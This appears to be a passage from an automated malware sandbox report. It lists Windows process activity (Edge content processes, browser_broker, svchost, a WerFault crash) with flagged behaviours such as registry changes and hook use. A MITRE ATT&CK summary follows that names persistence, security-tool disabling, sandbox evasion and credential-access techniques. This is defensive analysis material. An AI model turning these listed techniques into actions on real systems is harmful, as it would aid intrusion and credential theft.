"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8628

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3684

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6376

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5924

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6912

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3928

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3928 -s 2012
2⤵
- Program crash
PID:6732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6920

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3140

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8020

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3116

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2352

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3940

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7004

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4216

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6468

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6360

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2216

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7236

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8980

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7348

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8848

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4628

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4776

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5268

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4400

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:9472

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:9780

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9992

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10084

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10168

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

BITS Jobs

T1197

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

BITS Jobs

T1197

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery